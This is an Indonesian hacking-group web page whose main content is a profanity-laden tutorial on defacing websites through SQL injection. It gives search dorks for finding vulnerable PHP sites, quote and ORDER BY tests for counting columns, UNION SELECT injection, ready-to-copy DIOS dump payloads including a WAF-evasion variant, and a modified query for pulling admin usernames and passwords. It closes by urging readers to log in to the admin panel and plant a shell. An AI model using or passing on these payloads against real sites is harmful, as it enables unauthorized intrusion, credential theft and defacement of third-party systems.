WibuTersakitiTeam
Pendaftaran WTT
Wa Admin Kawan Kelam
Wa admin Sueb
Wa Admin Mr Never
Wa Admin DANZ Cyber
Wa admin Prince nightmare
Wa Admin BangkitJuangRaharjo
TOOLS OR WEBSITE
WibuTersakitiTeam Ofc Facebook
server corona lagi down jika tidak
Website Biar jalan pintas yekan
Game
Game WTT OFICIAL
Game panah panahan
materi
Deface Methode poc
deface web sqli
SQLI DUMP
Cara Kembangin Dork
KembangDorksPart2 -Site-
deface methode Kawaii file
Deface Poc Priv8
Andruino IOT
Tutorial Seputar TKJ
Sosmed Ig Dan Yt Member Admin
Follow ig Tn Hw
Youtobe an
Anime Song 24Hours Nonstop
Jadwal Materi

deface web sqli



Ok whatshap balik lagi dengan orang tampan yg bernama kawan kelam

Kita belajar sql manual jika disini dah belajar sql manual silahkan di skip ae tutorial ini

Alat bahan nya
1.kopi
2.rokok jika ngerokok
3.masker kalo lagi wifian di luar takut corona

Ok langsung ajaha nge dork

Inurl:love php?id=1
Inurl:love php?cid=

Dork bisa kembangin lagi buat webset baru ato yg join ke grup fans club gua suka bagi bagi webvuln jadi sans.
====================
Jika sudah ketemu
Targer langsung ajah kita cek cek lah web nya dengan menambah kan ( ' ) untuk mencek sql kode nya jika eror
C/ eror kode biasa nya

Eror sintak sql php?id= bla bla bla pokok nya ada kata diatas eror pasti web vuln.tapi ada 2 web yg harus kalian tau web vuln sql forbiden apa sql manual.

Jika sudah langsung kita hajar web nya

Dengan nambahin kata ajaib (+order+by+1(👈oh iya angka itu harus di ganti sampe berubah bentuk lah guys)--+-

Jadi kek gini
Site.com/kontol.php?id=1+order+by+1--+- (eror)
Site.com/kontol.php?id=1+order+by+2--+-(eror)
Site.com/kontol.php?id=1+order+by+3--+-(eror)
Site.com/kontol.php?id=1+order+by+4--+-(eror)
Site.com/kontol.php?id=1+order+by+5--+-(ga eror)

Nah berarti web nys vuln ampe 4
😁:lah kok ampe 4 harus nya kan 5
🧒😐: yang 5 itu ga eror kontol
😃:jangan marah bangsat

Nah langsung masukan kode ajaib
(+union+select+)
Jadi kek gini
C/

Site.com/kontol.php?id=-1+union+select+1,2,4--+-

Nah web lu vuln ampe berapa lu contoh gua eror sampe colom4 yah berarti gua masukin ampe 4 gitu gan.tapi jan lupa masukin tanda ( - )di depan = contoh (php?id=-1) ok next

Jika sudah nanti kalian akan dapat no togel gan
Contoh sajah gua dapst 3 jadi harus masukin nya

Site.com/kontol.php?id=-1+union+select+1,2,EXPLOIT,4--+-
👦🏼:kok itu nambahin exploit buat apa
🧒🏼:buat masukin dios nya kontol tau jembud ga si loh

💡🧒🏼 oh iya gua lupa ngasih dios nya
👦🏼 Dasar g guna
🧒🏼 bacod kali anda

Nih dios buat lu ada macam macam dios ya tmn tmn ada metbool ada zentai ='v. Untuk dios nya kalian salin di bawah ini
👇

MadBlood DIOS :
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))


ZEN with WAF DIOS:
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

====================
Jika sudah kalian langsung exploit kek tadi guys contoh dibawah ok
====================
site.com/kontol.php?id=-1+union+select+1,2,
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4--+-

Nantu kalean dapat sbuah tabel dump guys.Jadi kalian tinggal cari ajah ada bacaan use user kontol='v salah goblog (user pasword, user id)

Jika sudah ketemo kalian exploit lagi biar dapat password nyaea kan

Langsung ajah skuy


(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Kita asumsikan tanda : sebagai pemisah (lihat gambar). Tulisan yang berada di sebelah kiri tanda : nantinya kita gantikan pada query information_schema.columns yang berada di DIOS. Sedangkan tulisan yang berada di sebelah kanan tanda : kita masukkan pada query table_name dan column_name. Karena tujuan kita untuk mendapatkan username dan password admin, kita gantikan information_schema.columns dengan user. Untuk table_name ganti menjadi user_namedan column_name ganti menjadi user_pass. Maka querynya menjadi seperti ini

(Select+export_set(5,@:=0,(select+count(*)from(user)where@:=export_set(5,export_set(5,@,user_name,0x3c6c693e,2),user_pass,0xa3a,2)),@,2))

Nah kita dapat username dan password nya jka sudah kalian langsung ke WeB admin nya guys Masukin user dan pasword nya

🧒🏼 eet tunggu
👦🏼 Kenapa bang
🧒🏼 Lu lanjutin Sendiri masa gua suapin trus kontol lu tanem shell sendirilah kontol
👦🏼 yaudah dah plit lu kontol
🧒🏼 lu gua kasih ilmu kek tai ngajak ribut memek

© 2019 Jagel.id. All Rights Reserved. Powered by Yii Framework

Belajar cara membuat aplikasi Android di jagel